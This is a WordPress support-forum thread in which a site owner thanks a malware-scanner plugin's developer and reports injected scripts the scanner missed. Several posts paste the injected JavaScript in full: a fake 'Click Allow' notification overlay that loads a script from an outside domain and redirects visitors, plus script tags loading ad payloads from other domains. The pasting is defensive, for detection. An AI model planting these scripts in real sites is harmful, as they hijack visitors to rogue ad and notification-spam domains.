Forum Replies Created
-
AuthorPosts
-
just a quick thank you… the latest version deletes the variation of malware… can’t recommend your plugin enough! many many thanks.
it’s in posts files (not necessarily pages but other posts) /wp-admin/post.php?post=1615&action=edit
happy to give access to phpmyadmin and wp-admin
hiya, great tool as always!!! many many thanks Eli.
found that a new variation of this injected code is not being picked up.
tried a mysql query and it’s not picking up a char immediately after ““Allow—. char looks like a sq with 009Dwhen pasted into a sql query however it renders as a red bullet
database charset is utf8mb4_unicode_ci
have wrapped the char in a code tag, see html view of this msg.
;
const overlay = {“delay”:3000,”overlayStyle”:{“background”:”rgba(0,0,0, 0.6)”},”title”:”Attention!”,”description”:”Click “Allow†to subscribe to notifications and continue working with this website.”,…(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement(‘script’);
s.src=’//humsoolt.net/pfe/current/tag.min.js?z=2774009′;
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onPermissionAllowed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onPermissionDenied(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onAlreadySubscribed(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);just to let you know, and thankyou for info and update, chkd for latest download defn, JAQLO, and it hasn’t picked up the script in posts.
(However, i’m able to remove the script via a SQL query)
awesome plugin!
new db injection spotted that isn’t being picked up
<script async src=’//madsans.com/6f2d37b24c56899a75c10e01143c7901/invoke.js’></script>
Your plugin is probably now my favourite… and unfortunately it’s getting used quite a lot, as the redirect script is still getting into one of my sites running theGem theme.
site doesn’t have related posts plugin, and I have checked functions.php
Is my next task to reload fresh plugins and a fresh wp? any tips gratefully received.
I have other security plugins running, maybe that’s counter-productive?
Can you drop me a line about your hosting service?
(sorry bombarding you with multiple questions)
@ELI
Many thanks, even tho i cleaned the database, double checked pages and other content myself, your plugin still found and Fixed 34 occasions that were not picked up by other methods…
A big thank you.!!!
… malware also found in image descriptions, and custom footer, and page/post revisions… sigh (it’s not as if there was no protection on the site)
ok so ran a find on all wp files, ie checked all php and js files, then checked keywords in wp database using myphp, and found that all the malware scripts have been added to the page content. This was true for another site i cleaned last week.
here is the embedded script below for your info… oh and i had to deactivate bakery plugin, and use classic mode to edit page in raw/html (for reference sites were running php 7.0 or 1 or 2, they are now all on 7.3, all themes and plugins and wp versions were set to auto update, themes have been popular ones such as avada, betheme, enfold, theGem:
<script>
const overlayTranslations = {"en":{"title":"Attention!","description":"Click “Allow†to subscribe to notifications and continue working with this website."}};
const overlay = {"delay":3000,"overlayStyle":{"background":"rgba(0,0,0, 0.6)"},"title":"Attention!","description":"Click “Allow†to subscribe to notifications and continue working with this website.",...(overlayTranslations[navigator.language.slice(0, 2).toLowerCase()]||Object.values(overlayTranslations)[0])};
const s = document.createElement('script');
s.src='//humsoolt.net/pfe/current/tag.min.js?z=2774009';
s.onload = (sdk) => {
sdk.updateOptions({overlay, overlayTranslations})
sdk.onPermissionDefault(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionAllowed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onPermissionDenied(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onAlreadySubscribed(() => {window.location.replace("//ellcurvth.com/afu.php?zoneid=2826294")});
sdk.onNotificationUnsupported(() => {});
}
document.head.appendChild(s);
</script>
<script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script><script type='text/javascript' src='//pl15180773.pvclouds.com/2b/e2/3d/2be23d024eff3a5446e06744968768be.js'></script><script data-cfasync='false' type='text/javascript' src='//p79479.clksite.com/adServe/banners?tid=79479_127480_7&tagid=2'></script>hope this helps
any tips for prevention gladly received
i have similar issue: pages are redirecting, scan is not picking this up but
malware identified as rogueads.afu?3 by securi
sdk.onPermissionDefault(() => {window.location.replace(“//ellcurvth.com/afu.php?zoneid=2826294″)});
have not as yet completely cleaned the site, i provide services to charity and community orgs in my spare time and they’ve pretty much all been hit with same malware -
AuthorPosts